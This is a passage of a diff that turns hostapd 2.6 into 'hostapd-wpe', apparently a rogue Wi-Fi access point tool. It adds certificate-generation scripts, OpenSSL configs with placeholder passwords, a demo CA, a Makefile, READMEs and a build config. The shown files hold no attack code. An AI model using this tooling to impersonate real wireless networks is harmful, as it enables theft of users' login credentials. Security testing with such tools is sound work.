1diff -rupN hostapd-2.6/hostapd/certs/bootstrap hostapd-2.6-wpe/hostapd/certs/bootstrap 2--- hostapd-2.6/hostapd/certs/bootstrap 1970-01-01 01:00:00.000000000 +0100 3+++ hostapd-2.6-wpe/hostapd/certs/bootstrap 2018-05-21 11:37:58.859577170 +0200 4@@ -0,0 +1,82 @@ 5+#!/bin/sh 6+# 7+# This is a wrapper script to create default certificates when the 8+# server first starts in debugging mode. Once the certificates have been 9+# created, this file should be deleted. 10+# 11+# Ideally, this program should be run as part of the installation of any 12+# binary package. The installation should also ensure that the permissions 13+# and owners are correct for the files generated by this script. 14+# 15+# $Id: c9d939beac8d5bdc21ea1ff9233442f9ab933297 $ 16+# 17+umask 027 18+cd `dirname $0` 19+ 20+make -h > /dev/null 2>&1 21+ 22+# 23+# If we have a working "make", then use it. Otherwise, run the commands 24+# manually. 25+# 26+if [ "$?" = "0" ]; then 27+ make all 28+ exit $? 29+fi 30+ 31+# 32+# The following commands were created by running "make -n", and edited 33+# to remove the trailing backslash, and to add "exit 1" after the commands. 34+# 35+# Don't edit the following text. Instead, edit the Makefile, and 36+# re-generate these commands. 37+# 38+if [ ! -f dh ]; then 39+ openssl dhparam -out dh 1024 || exit 1 40+ if [ -e /dev/urandom ] ; then 41+ ln -sf /dev/urandom random 42+ else 43+ date > ./random; 44+ fi 45+fi 46+ 47+if [ ! -f server.key ]; then 48+ openssl req -new -out server.csr -keyout server.key -config ./server.cnf || exit 1 49+fi 50+ 51+if [ ! -f ca.key ]; then 52+ openssl req -new -x509 -keyout ca.key -out ca.pem -days `grep default_days ca.cnf | sed 's/.*=//;s/^ *//'` -config ./ca.cnf || exit 1 53+fi 54+ 55+if [ ! -f index.txt ]; then 56+ touch index.txt 57+fi 58+ 59+if [ ! -f serial ]; then 60+ echo '01' > serial 61+fi 62+ 63+if [ ! -f server.crt ]; then 64+ openssl ca -batch -keyfile ca.key -cert ca.pem -in server.csr -key `grep output_password ca.cnf | sed 's/.*=//;s/^ *//'` -out server.crt -extensions xpserver_ext -extfile xpextensions -config ./server.cnf || exit 1 65+fi 66+ 67+if [ ! -f server.p12 ]; then 68+ openssl pkcs12 -export -in server.crt -inkey server.key -out server.p12 -passin pass:`grep output_password server.cnf | sed 's/.*=//;s/^ *//'` -passout pass:`grep output_password server.cnf | sed 's/.*=//;s/^ *//'` || exit 1 69+fi 70+ 71+if [ ! -f server.pem ]; then 72+ openssl pkcs12 -in server.p12 -out server.pem -passin pass:`grep output_password server.cnf | sed 's/.*=//;s/^ *//'` -passout pass:`grep output_password server.cnf | sed 's/.*=//;s/^ *//'` || exit 1 73+ openssl verify -CAfile ca.pem server.pem || exit 1 74+fi 75+ 76+if [ ! -f ca.der ]; then 77+ openssl x509 -inform PEM -outform DER -in ca.pem -out ca.der || exit 1 78+fi 79+ 80+if [ ! -f client.key ]; then 81+ openssl req -new -out client.csr -keyout client.key -config ./client.cnf 82+fi 83+ 84+if [ ! -f client.crt ]; then 85+ openssl ca -batch -keyfile ca.key -cert ca.pem -in client.csr -key `grep output_password ca.cnf | sed 's/.*=//;s/^ *//'` -out client.crt -extensions xpclient_ext -extfile xpextensions -config ./client.cnf 86+fi 87diff -rupN hostapd-2.6/hostapd/certs/ca.cnf hostapd-2.6-wpe/hostapd/certs/ca.cnf 88--- hostapd-2.6/hostapd/certs/ca.cnf 1970-01-01 01:00:00.000000000 +0100 89+++ hostapd-2.6-wpe/hostapd/certs/ca.cnf 2018-05-21 11:37:58.859577170 +0200 90@@ -0,0 +1,62 @@ 91+[ ca ] 92+default_ca = CA_default 93+ 94+[ CA_default ] 95+dir = ./ 96+certs = $dir 97+crl_dir = $dir/crl 98+database = $dir/index.txt 99+new_certs_dir = $dir 100+certificate = $dir/ca.pem 101+serial = $dir/serial 102+crl = $dir/crl.pem 103+private_key = $dir/ca.key 104+RANDFILE = $dir/.rand 105+name_opt = ca_default 106+cert_opt = ca_default 107+default_days = 365 108+default_crl_days = 364 109+default_md = sha256 110+preserve = no 111+policy = policy_match 112+crlDistributionPoints = URI:http://www.example.org/example_ca.crl 113+ 114+[ policy_match ] 115+countryName = match 116+stateOrProvinceName = match 117+organizationName = match 118+organizationalUnitName = optional 119+commonName = supplied 120+emailAddress = optional 121+ 122+[ policy_anything ] 123+countryName = optional 124+stateOrProvinceName = optional 125+localityName = optional 126+organizationName = optional 127+organizationalUnitName = optional 128+commonName = supplied 129+emailAddress = optional 130+ 131+[ req ] 132+prompt = no 133+distinguished_name = certificate_authority 134+default_bits = 2048 135+input_password = whatever 136+output_password = whatever 137+x509_extensions = v3_ca 138+ 139+[certificate_authority] 140+countryName = FR 141+stateOrProvinceName = Radius 142+localityName = Somewhere 143+organizationName = Example Inc. 144+emailAddress = admin@example.org 145+commonName = "Example Certificate Authority" 146+ 147+[v3_ca] 148+subjectKeyIdentifier = hash 149+authorityKeyIdentifier = keyid:always,issuer:always 150+basicConstraints = critical,CA:true 151+crlDistributionPoints = URI:http://www.example.org/example_ca.crl 152+ 153diff -rupN hostapd-2.6/hostapd/certs/client.cnf hostapd-2.6-wpe/hostapd/certs/client.cnf 154--- hostapd-2.6/hostapd/certs/client.cnf 1970-01-01 01:00:00.000000000 +0100 155+++ hostapd-2.6-wpe/hostapd/certs/client.cnf 2018-05-21 11:37:58.859577170 +0200 156@@ -0,0 +1,53 @@ 157+[ ca ] 158+default_ca = CA_default 159+ 160+[ CA_default ] 161+dir = ./ 162+certs = $dir 163+crl_dir = $dir/crl 164+database = $dir/index.txt 165+new_certs_dir = $dir 166+certificate = $dir/ca.pem 167+serial = $dir/serial 168+crl = $dir/crl.pem 169+private_key = $dir/ca.key 170+RANDFILE = $dir/.rand 171+name_opt = ca_default 172+cert_opt = ca_default 173+default_days = 365 174+default_crl_days = 364 175+default_md = sha256 176+preserve = no 177+policy = policy_match 178+ 179+[ policy_match ] 180+countryName = match 181+stateOrProvinceName = match 182+organizationName = match 183+organizationalUnitName = optional 184+commonName = supplied 185+emailAddress = optional 186+ 187+[ policy_anything ] 188+countryName = optional 189+stateOrProvinceName = optional 190+localityName = optional 191+organizationName = optional 192+organizationalUnitName = optional 193+commonName = supplied 194+emailAddress = optional 195+ 196+[ req ] 197+prompt = no 198+distinguished_name = client 199+default_bits = 2048 200+input_password = whatever 201+output_password = whatever 202+ 203+[client] 204+countryName = FR 205+stateOrProvinceName = Radius 206+localityName = Somewhere 207+organizationName = Example Inc. 208+emailAddress = user@example.org 209+commonName = user@example.org 210diff -rupN hostapd-2.6/hostapd/certs/demoCA/cacert.pem hostapd-2.6-wpe/hostapd/certs/demoCA/cacert.pem 211--- hostapd-2.6/hostapd/certs/demoCA/cacert.pem 1970-01-01 01:00:00.000000000 +0100 212+++ hostapd-2.6-wpe/hostapd/certs/demoCA/cacert.pem 2018-05-21 11:37:58.859577170 +0200 213@@ -0,0 +1,22 @@ 214+-----BEGIN CERTIFICATE----- 215+MIIDtjCCAx+gAwIBAgIBADANBgkqhkiG9w0BAQQFADCBnzELMAkGA1UEBhMCQ0Ex 216+ETAPBgNVBAgTCFByb3ZpbmNlMRIwEAYDVQQHEwlTb21lIENpdHkxFTATBgNVBAoT 217+DE9yZ2FuaXphdGlvbjESMBAGA1UECxMJbG9jYWxob3N0MRswGQYDVQQDExJDbGll 218+bnQgY2VydGlmaWNhdGUxITAfBgkqhkiG9w0BCQEWEmNsaWVudEBleGFtcGxlLmNv 219+bTAeFw0wNDAxMjUxMzI2MDdaFw0wNjAxMjQxMzI2MDdaMIGfMQswCQYDVQQGEwJD 220+QTERMA8GA1UECBMIUHJvdmluY2UxEjAQBgNVBAcTCVNvbWUgQ2l0eTEVMBMGA1UE 221+ChMMT3JnYW5pemF0aW9uMRIwEAYDVQQLEwlsb2NhbGhvc3QxGzAZBgNVBAMTEkNs 222+aWVudCBjZXJ0aWZpY2F0ZTEhMB8GCSqGSIb3DQEJARYSY2xpZW50QGV4YW1wbGUu 223+Y29tMIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDUxbGXJPFkrPH/sYnbHI+/ 224+9PFDlup8sekPeNaUUXJTd4ld/lLMuZtB6A3etYsSepQ/T1jLxWKHgZL73G/s6fhx 225+58Ew01z1GIgX6bEzJJ7dKhx10xBDrodVPOx6d+8mqn10KB25t34XxkRsXdmxiLQy 226+UMoCKZY3IqEjpyawC0An/QIDAQABo4H/MIH8MB0GA1UdDgQWBBRo020+Hue8nVoF 227+cCHDY9oTZdGt4zCBzAYDVR0jBIHEMIHBgBRo020+Hue8nVoFcCHDY9oTZdGt46GB 228+paSBojCBnzELMAkGA1UEBhMCQ0ExETAPBgNVBAgTCFByb3ZpbmNlMRIwEAYDVQQH 229+EwlTb21lIENpdHkxFTATBgNVBAoTDE9yZ2FuaXphdGlvbjESMBAGA1UECxMJbG9j 230+YWxob3N0MRswGQYDVQQDExJDbGllbnQgY2VydGlmaWNhdGUxITAfBgkqhkiG9w0B 231+CQEWEmNsaWVudEBleGFtcGxlLmNvbYIBADAMBgNVHRMEBTADAQH/MA0GCSqGSIb3 232+DQEBBAUAA4GBADPAC2ax5Xnvc6BnmCUtq41eVRH8AP0nbYDRL4NHd8Z0P9wnQ/yh 233+UHcE5LwJeeT2CsOtnug+bzRzaSKdH3cim6LpgjWdpWMCSgAWPbptbJhsC60or4UT 234+L/jw12UBvxt8Lf9ljOHmLAGZe25k4+jUNzNUzpkShHZRU5BjuFu8VIXF 235+-----END CERTIFICATE----- 236diff -rupN hostapd-2.6/hostapd/certs/Makefile hostapd-2.6-wpe/hostapd/certs/Makefile 237--- hostapd-2.6/hostapd/certs/Makefile 1970-01-01 01:00:00.000000000 +0100 238+++ hostapd-2.6-wpe/hostapd/certs/Makefile 2018-05-21 11:37:58.859577170 +0200 239@@ -0,0 +1,145 @@ 240+###################################################################### 241+# 242+# Make file to be installed in /etc/raddb/certs to enable 243+# the easy creation of certificates. 244+# 245+# See the README file in this directory for more information. 246+# 247+# $Id: cc12464c6c7754aff2f0c8d6e116708c94ff2168 $ 248+# 249+###################################################################### 250+ 251+DH_KEY_SIZE = 2048 252+ 253+# 254+# Set the passwords 255+# 256+-include passwords.mk 257+ 258+###################################################################### 259+# 260+# Make the necessary files, but not client certificates. 261+# 262+###################################################################### 263+.PHONY: all 264+all: index.txt serial dh server ca client 265+ 266+.PHONY: client 267+client: client.pem 268+ 269+.PHONY: ca 270+ca: ca.der 271+ 272+.PHONY: server 273+server: server.pem server.vrfy 274+ 275+.PHONY: verify 276+verify: server.vrfy client.vrfy 277+ 278+passwords.mk: server.cnf ca.cnf client.cnf 279+ @echo "PASSWORD_SERVER = '$(shell grep output_password server.cnf | sed 's/.*=//;s/^ *//')'" > $@ 280+ @echo "PASSWORD_CA = '$(shell grep output_password ca.cnf | sed 's/.*=//;s/^ *//')'" >> $@ 281+ @echo "PASSWORD_CLIENT = '$(shell grep output_password client.cnf | sed 's/.*=//;s/^ *//')'" >> $@ 282+ @echo "USER_NAME = '$(shell grep emailAddress client.cnf | grep '@' | sed 's/.*=//;s/^ *//')'" >> $@ 283+ @echo "CA_DEFAULT_DAYS = '$(shell grep default_days ca.cnf | sed 's/.*=//;s/^ *//')'" >> $@ 284+ 285+###################################################################### 286+# 287+# Diffie-Hellman parameters 288+# 289+###################################################################### 290+dh: 291+ openssl dhparam -out dh -2 $(DH_KEY_SIZE) 292+ 293+###################################################################### 294+# 295+# Create a new self-signed CA certificate 296+# 297+###################################################################### 298+ca.key ca.pem: ca.cnf 299+ @[ -f index.txt ] || $(MAKE) index.txt 300+ @[ -f serial ] || $(MAKE) serial 301+ openssl req -new -x509 -keyout ca.key -out ca.pem \ 302+ -days $(CA_DEFAULT_DAYS) -config ./ca.cnf 303+ 304+ca.der: ca.pem 305+ openssl x509 -inform PEM -outform DER -in ca.pem -out ca.der 306+ 307+###################################################################### 308+# 309+# Create a new server certificate, signed by the above CA. 310+# 311+###################################################################### 312+server.csr server.key: server.cnf 313+ openssl req -new -out server.csr -keyout server.key -config ./server.cnf 314+ 315+server.crt: server.csr ca.key ca.pem 316+ openssl ca -batch -keyfile ca.key -cert ca.pem -in server.csr -key $(PASSWORD_CA) -out server.crt -extensions xpserver_ext -extfile xpextensions -config ./server.cnf 317+ 318+server.p12: server.crt 319+ openssl pkcs12 -export -in server.crt -inkey server.key -out server.p12 -passin pass:$(PASSWORD_SERVER) -passout pass:$(PASSWORD_SERVER) 320+ 321+server.pem: server.p12 322+ openssl pkcs12 -in server.p12 -out server.pem -passin pass:$(PASSWORD_SERVER) -passout pass:$(PASSWORD_SERVER) 323+ 324+.PHONY: server.vrfy 325+server.vrfy: ca.pem 326+ @openssl verify -CAfile ca.pem server.pem 327+ 328+###################################################################### 329+# 330+# Create a new client certificate, signed by the the above server 331+# certificate. 332+# 333+###################################################################### 334+client.csr client.key: client.cnf 335+ openssl req -new -out client.csr -keyout client.key -config ./client.cnf 336+ 337+client.crt: client.csr ca.pem ca.key 338+ openssl ca -batch -keyfile ca.key -cert ca.pem -in client.csr -key $(PASSWORD_CA) -out client.crt -extensions xpclient_ext -extfile xpextensions -config ./client.cnf 339+ 340+client.p12: client.crt 341+ openssl pkcs12 -export -in client.crt -inkey client.key -out client.p12 -passin pass:$(PASSWORD_CLIENT) -passout pass:$(PASSWORD_CLIENT) 342+ 343+client.pem: client.p12 344+ openssl pkcs12 -in client.p12 -out client.pem -passin pass:$(PASSWORD_CLIENT) -passout pass:$(PASSWORD_CLIENT) 345+ cp client.pem $(USER_NAME).pem 346+ 347+.PHONY: client.vrfy 348+client.vrfy: ca.pem client.pem 349+ c_rehash . 350+ openssl verify -CApath . client.pem 351+ 352+###################################################################### 353+# 354+# Miscellaneous rules. 355+# 356+###################################################################### 357+index.txt: 358+ @touch index.txt 359+ 360+serial: 361+ @echo '01' > serial 362+ 363+print: 364+ openssl x509 -text -in server.crt 365+ 366+printca: 367+ openssl x509 -text -in ca.pem 368+ 369+install: 370+ install -d $(DESTDIR)/etc/hostapd-wpe 371+ install -m 644 dh $(DESTDIR)/etc/hostapd-wpe 372+ install -m 644 ca.pem $(DESTDIR)/etc/hostapd-wpe 373+ install -m 644 server.pem $(DESTDIR)/etc/hostapd-wpe 374+ install -m 644 server.key $(DESTDIR)/etc/hostapd-wpe 375+ 376+clean: 377+ @rm -f *~ *old client.csr client.key client.crt client.p12 client.pem 378+ 379+# 380+# Make a target that people won't run too often. 381+# 382+destroycerts: 383+ rm -f *~ dh *.csr *.crt *.p12 *.der *.pem *.key index.txt* \ 384+ serial* *\.0 *\.1 385diff -rupN hostapd-2.6/hostapd/certs/README hostapd-2.6-wpe/hostapd/certs/README 386--- hostapd-2.6/hostapd/certs/README 1970-01-01 01:00:00.000000000 +0100 387+++ hostapd-2.6-wpe/hostapd/certs/README 2018-05-21 11:37:58.859577170 +0200 388@@ -0,0 +1,226 @@ 389+ This directory contains scripts to create the server certificates. 390+To make a set of default (i.e. test) certificates, simply type: 391+ 392+$ ./bootstrap 393+ 394+ The "openssl" command will be run against the sample configuration 395+files included here, and will make a self-signed certificate authority 396+(i.e. root CA), and a server certificate. This "root CA" should be 397+installed on any client machine needing to do EAP-TLS, PEAP, or 398+EAP-TTLS. 399+ 400+ The Microsoft "XP Extensions" will be automatically included in the 401+server certificate. Without those extensions Windows clients will 402+refuse to authenticate to FreeRADIUS. 403+ 404+ The root CA and the "XP Extensions" file also contain a crlDistributionPoints 405+attribute. The latest release of Windows Phone needs this to be present 406+for the handset to validate the RADIUS server certificate. The RADIUS 407+server must have the URI defined but the CA need not have...however it 408+is best practice for a CA to have a revocation URI. Note that whilst 409+the Windows Mobile client cannot actually use the CRL when doing 802.1X 410+it is recommended that the URI be an actual working URL and contain a 411+revocation format file as there may be other OS behaviour at play and 412+future OSes that may do something with that URI. 413+ 414+ In general, you should use self-signed certificates for 802.1x (EAP) 415+authentication. When you list root CAs from other organisations in 416+the "ca_file", you permit them to masquerade as you, to authenticate 417+your users, and to issue client certificates for EAP-TLS. 418+ 419+ If FreeRADIUS was configured to use OpenSSL, then simply starting 420+the server in root in debugging mode should also create test 421+certificates, i.e.: 422+ 423+$ radiusd -X 424+ 425+ That will cause the EAP-TLS module to run the "bootstrap" script in 426+this directory. The script will be executed only once, the first time 427+the server has been installed on a particular machine. This bootstrap 428+script SHOULD be run on installation of any pre-built binary package 429+for your OS. In any case, the script will ensure that it is not run 430+twice, and that it does not over-write any existing certificates. 431+ 432+ If you already have CA and server certificates, rename (or delete) 433+this directory, and create a new "certs" directory containing your 434+certificates. Note that the "make install" command will NOT 435+over-write your existing "raddb/certs" directory, which means that the 436+"bootstrap" command will not be run. 437+ 438+ 439+ NEW INSTALLATIONS OF FREERADIUS 440+ 441+ 442+ We suggest that new installations use the test certificates for 443+initial tests, and then create real certificates to use for normal 444+user authentication. See the instructions below for how to create the 445+various certificates. The old test certificates can be deleted by 446+running the following command: 447+ 448+$ rm -f *.pem *.der *.csr *.crt *.key *.p12 serial* index.txt* 449+ 450+ Then, follow the instructions below for creating real certificates. 451+ 452+ Once the final certificates have been created, you can delete the 453+"bootstrap" command from this directory, and delete the 454+"make_cert_command" configuration from the "tls" sub-section of 455+eap.conf. 456+ 457+ If you do not want to enable EAP-TLS, PEAP, or EAP-TTLS, then delete 458+the relevant sub-sections from the "eap.conf" file. 459+ 460+ 461+ MAKING A ROOT CERTIFICATE 462+ 463+ 464+$ vi ca.cnf 465+ 466+ Edit the "input_password" and "output_password" fields to be the 467+ password for the CA certificate. 468+ 469+ Edit the [certificate_authority] section to have the correct values 470+ for your country, state, etc. 471+ 472+$ make ca.pem 473+ 474+ This step creates the CA certificate. 475+ 476+$ make ca.der 477+ 478+ This step creates the DER format of the self-signed certificate, 479+ which is can be imported into Windows. 480+ 481+ 482+ MAKING A SERVER CERTIFICATE 483+ 484+ 485+$ vi server.cnf 486+ 487+ Edit the "input_password" and "output_password" fields to be the 488+ password for the server certificate. 489+ 490+ Edit the [server] section to have the correct values for your 491+ country, state, etc. Be sure that the commonName field here is 492+ different from the commonName for the CA certificate. 493+ 494+$ make server.pem 495+ 496+ This step creates the server certificate. 497+ 498+ If you have an existing certificate authority, and wish to create a 499+ certificate signing request for the server certificate, edit 500+ server.cnf as above, and type the following command. 501+ 502+$ make server.csr 503+ 504+ You will have to ensure that the certificate contains the XP 505+ extensions needed by Microsoft clients. 506+ 507+ 508+ MAKING A CLIENT CERTIFICATE 509+ 510+ 511+ Client certificates are used by EAP-TLS, and optionally by EAP-TTLS 512+and PEAP. The following steps outline how to create a client 513+certificate that is signed by the server certificate created above. 514+You will have to have the password for the server certificate in the 515+"input_password" and "output_password" fields of the server.cnf file. 516+ 517+ 518+$ vi client.cnf 519+ 520+ Edit the "input_password" and "output_password" fields to be the 521+ password for the client certificate. You will have to give these 522+ passwords to the end user who will be using the certificates. 523+ 524+ Edit the [client] section to have the correct values for your 525+ country, state, etc. Be sure that the commonName field here is 526+ the User-Name that will be used for logins! 527+ 528+$ make client.pem 529+ 530+ The users certificate will be in "emailAddress.pem", 531+ i.e. "user@example.com.pem". 532+ 533+ To create another client certificate, just repeat the steps for 534+ making a client certificate, being sure to enter a different login 535+ name for "commonName", and a different password. 536+ 537+ 538+ PERFORMANCE 539+ 540+ 541+ EAP performance for EAP-TLS, TTLS, and PEAP is dominated by SSL 542+ calculations. That is, a normal system can handle PAP 543+ authentication at a rate of 10k packets/s. However, SSL involves 544+ RSA calculations, which are very expensive. To benchmark your system, 545+ do: 546+ 547+$ openssl speed rsa 548+ 549+ or 550+ 551+$ openssl speed rsa2048 552+ 553+ to test 2048 bit keys. 554+ 555+ A 1GHz system will likely do 30 calculations/s. A 2GHz system may 556+ do 50 calculations/s, or more. That number is also the number of 557+ authentications/s that can be done for EAP-TLS (or TTLS, or PEAP). 558+ 559+ 560+ COMPATIBILITY 561+ 562+The certificates created using this method are known to be compatible 563+with ALL operating systems. Some common issues are: 564+ 565+ - Windows requires certain OIDs in the certificates. If it doesn't 566+ see them, it will stop doing EAP. The most visible effect is 567+ that the client starts EAP, gets a few Access-Challenge packets, 568+ and then a little while later re-starts EAP. If this happens, see 569+ the FAQ, and the comments in raddb/eap.conf for how to fix it. 570+ 571+ - Windows requires the root certificates to be on the client PC. 572+ If it doesn't have them, you will see the same issue as above. 573+ 574+ - Windows XP post SP2 has a bug where it has problems with 575+ certificate chains. i.e. if the server certificate is an 576+ intermediate one, and not a root one, then authentication will 577+ silently fail, as above. 578+ 579+ - Some versions of Windows CE cannot handle 4K RSA certificates. 580+ They will (again) silently fail, as above. 581+ 582+ - In none of these cases will Windows give the end user any 583+ reasonable error message describing what went wrong. This leads 584+ people to blame the RADIUS server. That blame is misplaced. 585+ 586+ - Certificate chains of more than 64K bytes are known to not work. 587+ This is a problem in FreeRADIUS. However, most clients cannot 588+ handle 64K certificate chains. Most Access Points will shut down 589+ the EAP session after about 50 round trips, while 64K certificate 590+ chains will take about 60 round trips. So don't use large 591+ certificate chains. They will only work after everyone upgrade 592+ everything in the network. 593+ 594+ - All other operating systems are known to work with EAP and 595+ FreeRADIUS. This includes Linux, *BSD, Mac OS X, Solaris, 596+ Symbian, along with all known embedded systems, phones, WiFi 597+ devices, etc. 598+ 599+ - Someone needs to ask Microsoft to please stop making life hard for 600+ their customers. 601+ 602+ 603+ SECURITY CONSIDERATIONS 604+ 605+The default certificate configuration files uses MD5 for message 606+digests, to maintain compatibility with network equipment that 607+supports only this algorithm. 608+ 609+MD5 has known weaknesses and is discouraged in favour of SHA1 (see 610+http://www.kb.cert.org/vuls/id/836068 for details). If your network 611+equipment supports the SHA1 signature algorithm, we recommend that you 612+change the "ca.cnf", "server.cnf", and "client.cnf" files to specify 613+the use of SHA1 for the certificates. To do this, change the 614+'default_md' entry in those files from 'md5' to 'sha1'. 615diff -rupN hostapd-2.6/hostapd/certs/README.wpe hostapd-2.6-wpe/hostapd/certs/README.wpe 616--- hostapd-2.6/hostapd/certs/README.wpe 1970-01-01 01:00:00.000000000 +0100 617+++ hostapd-2.6-wpe/hostapd/certs/README.wpe 2018-05-21 11:37:58.859577170 +0200 618@@ -0,0 +1,13 @@ 619+# Certificate creation for Hostapd-WPE # 620+######################################## 621+ 622+Usage: 623+ 624+make clean 625+./bootstrap 626+make install 627+ 628+Notes: 629+- Windows 10 (and possibly any Windows starting from Vista) will fail EAP 630+ if certificates signed with MD5 are used. 631+- Generated certificates used a SHA256 signature. 632diff -rupN hostapd-2.6/hostapd/certs/server.cnf hostapd-2.6-wpe/hostapd/certs/server.cnf 633--- hostapd-2.6/hostapd/certs/server.cnf 1970-01-01 01:00:00.000000000 +0100 634+++ hostapd-2.6-wpe/hostapd/certs/server.cnf 2018-05-21 11:37:58.859577170 +0200 635@@ -0,0 +1,54 @@ 636+[ ca ] 637+default_ca = CA_default 638+ 639+[ CA_default ] 640+dir = ./ 641+certs = $dir 642+crl_dir = $dir/crl 643+database = $dir/index.txt 644+new_certs_dir = $dir 645+certificate = $dir/server.pem 646+serial = $dir/serial 647+crl = $dir/crl.pem 648+private_key = $dir/server.key 649+RANDFILE = $dir/.rand 650+name_opt = ca_default 651+cert_opt = ca_default 652+default_days = 60 653+default_crl_days = 30 654+default_md = sha256 655+preserve = no 656+policy = policy_match 657+ 658+[ policy_match ] 659+countryName = match 660+stateOrProvinceName = match 661+organizationName = match 662+organizationalUnitName = optional 663+commonName = supplied 664+emailAddress = optional 665+ 666+[ policy_anything ] 667+countryName = optional 668+stateOrProvinceName = optional 669+localityName = optional 670+organizationName = optional 671+organizationalUnitName = optional 672+commonName = supplied 673+emailAddress = optional 674+ 675+[ req ] 676+prompt = no 677+distinguished_name = server 678+default_bits = 2048 679+input_password = whatever 680+output_password = whatever 681+ 682+[server] 683+countryName = FR 684+stateOrProvinceName = Radius 685+localityName = Somewhere 686+organizationName = Example Inc. 687+emailAddress = admin@example.org 688+commonName = "Example Server Certificate" 689+ 690diff -rupN hostapd-2.6/hostapd/certs/xpextensions hostapd-2.6-wpe/hostapd/certs/xpextensions 691--- hostapd-2.6/hostapd/certs/xpextensions 1970-01-01 01:00:00.000000000 +0100 692+++ hostapd-2.6-wpe/hostapd/certs/xpextensions 2018-05-21 11:37:58.859577170 +0200 693@@ -0,0 +1,24 @@ 694+# 695+# File containing the OIDs required for Windows. 696+# 697+# http://support.microsoft.com/kb/814394/en-us 698+# 699+[ xpclient_ext] 700+extendedKeyUsage = 1.3.6.1.5.5.7.3.2 701+crlDistributionPoints = URI:http://www.example.com/example_ca.crl 702+ 703+[ xpserver_ext] 704+extendedKeyUsage = 1.3.6.1.5.5.7.3.1 705+crlDistributionPoints = URI:http://www.example.com/example_ca.crl 706+ 707+# 708+# Add this to the PKCS#7 keybag attributes holding the client's private key 709+# for machine authentication. 710+# 711+# the presence of this OID tells Windows XP that the cert is intended 712+# for use by the computer itself, and not by an end-user. 713+# 714+# The other solution is to use Microsoft's web certificate server 715+# to generate these certs. 716+# 717+# 1.3.6.1.4.1.311.17.2 718diff -rupN hostapd-2.6/hostapd/.config hostapd-2.6-wpe/hostapd/.config 719--- hostapd-2.6/hostapd/.config 1970-01-01 01:00:00.000000000 +0100 720+++ hostapd-2.6-wpe/hostapd/.config 2018-05-21 11:37:58.859577170 +0200 721@@ -0,0 +1,345 @@ 722+# Wireless Pawn Edition HostAPd configuration file 723+# 724+# This file lists the configuration options that are used when building the 725+# hostapd binary. All lines starting with # are ignored. Configuration option 726+# lines must be commented out complete, if they are not to be included, i.e., 727+# just setting VARIABLE=n is not disabling that variable. 728+# 729+# This file is included in Makefile, so variables like CFLAGS and LIBS can also 730+# be modified from here. In most cass, these lines should use += in order not 731+# to override previous values of the variables. 732+ 733+# Driver interface for Host AP driver 734+CONFIG_DRIVER_HOSTAP=y 735+ 736+# Driver interface for wired authenticator 737+CONFIG_DRIVER_WIRED=y 738+ 739+# Driver interface for drivers using the nl80211 kernel interface 740+CONFIG_DRIVER_NL80211=y 741+ 742+# QCA vendor extensions to nl80211 743+CONFIG_DRIVER_NL80211_QCA=y 744+ 745+# driver_nl80211.c requires libnl. If you are compiling it yourself 746+# you may need to point hostapd to your version of libnl. 747+# 748+#CFLAGS += -I$<path to libnl include files> 749+#LIBS += -L$<path to libnl library files> 750+ 751+# Use libnl v2.0 (or 3.0) libraries. 752+#CONFIG_LIBNL20=y 753+ 754+# Use libnl 3.2 libraries (if this is selected, CONFIG_LIBNL20 is ignored) 755+CONFIG_LIBNL32=y 756+ 757+ 758+# Driver interface for FreeBSD net80211 layer (e.g., Atheros driver) 759+#CONFIG_DRIVER_BSD=y 760+#CFLAGS += -I/usr/local/include 761+#LIBS += -L/usr/local/lib 762+#LIBS_p += -L/usr/local/lib 763+#LIBS_c += -L/usr/local/lib 764+ 765+# Driver interface for no driver (e.g., RADIUS server only) 766+#CONFIG_DRIVER_NONE=y 767+ 768+# IEEE 802.11F/IAPP 769+CONFIG_IAPP=y 770+ 771+# WPA2/IEEE 802.11i RSN pre-authentication 772+CONFIG_RSN_PREAUTH=y 773+ 774+# PeerKey handshake for Station to Station Link (IEEE 802.11e DLS) 775+CONFIG_PEERKEY=y 776+ 777+# IEEE 802.11w (management frame protection) 778+CONFIG_IEEE80211W=y 779+ 780+# Integrated EAP server 781+CONFIG_EAP=y 782+ 783+# EAP Re-authentication Protocol (ERP) in integrated EAP server 784+CONFIG_ERP=y 785+ 786+# EAP-MD5 for the integrated EAP server 787+CONFIG_EAP_MD5=y 788+ 789+# EAP-TLS for the integrated EAP server 790+CONFIG_EAP_TLS=y 791+ 792+# EAP-MSCHAPv2 for the integrated EAP server 793+CONFIG_EAP_MSCHAPV2=y 794+ 795+# EAP-PEAP for the integrated EAP server 796+CONFIG_EAP_PEAP=y 797+ 798+# EAP-GTC for the integrated EAP server 799+CONFIG_EAP_GTC=y 800+ 801+# EAP-TTLS for the integrated EAP server 802+CONFIG_EAP_TTLS=y 803+ 804+# EAP-SIM for the integrated EAP server 805+CONFIG_EAP_SIM=y 806+ 807+# EAP-AKA for the integrated EAP server 808+CONFIG_EAP_AKA=y 809+ 810+# EAP-AKA' for the integrated EAP server 811+# This requires CONFIG_EAP_AKA to be enabled, too. 812+CONFIG_EAP_AKA_PRIME=y 813+ 814+# EAP-PAX for the integrated EAP server 815+CONFIG_EAP_PAX=y 816+ 817+# EAP-PSK for the integrated EAP server (this is _not_ needed for WPA-PSK) 818+CONFIG_EAP_PSK=y 819+ 820+# EAP-pwd for the integrated EAP server (secure authentication with a password) 821+CONFIG_EAP_PWD=y 822+ 823+# EAP-SAKE for the integrated EAP server 824+CONFIG_EAP_SAKE=y 825+ 826+# EAP-GPSK for the integrated EAP server 827+CONFIG_EAP_GPSK=y 828+# Include support for optional SHA256 cipher suite in EAP-GPSK 829+CONFIG_EAP_GPSK_SHA256=y 830+ 831+# EAP-FAST for the integrated EAP server 832+# Note: If OpenSSL is used as the TLS library, OpenSSL 1.0 or newer is needed 833+# for EAP-FAST support. Older OpenSSL releases would need to be patched, e.g., 834+# with openssl-0.9.8x-tls-extensions.patch, to add the needed functions. 835+CONFIG_EAP_FAST=y 836+ 837+# Wi-Fi Protected Setup (WPS) 838+CONFIG_WPS=y 839+# Enable UPnP support for external WPS Registrars 840+CONFIG_WPS_UPNP=y 841+# Enable WPS support with NFC config method 842+CONFIG_WPS_NFC=y 843+ 844+# EAP-IKEv2 845+CONFIG_EAP_IKEV2=y 846+ 847+# Trusted Network Connect (EAP-TNC) 848+CONFIG_EAP_TNC=y 849+ 850+# EAP-EKE for the integrated EAP server 851+#CONFIG_EAP_EKE=y 852+ 853+# PKCS#12 (PFX) support (used to read private key and certificate file from 854+# a file that usually has extension .p12 or .pfx) 855+CONFIG_PKCS12=y 856+ 857+# RADIUS authentication 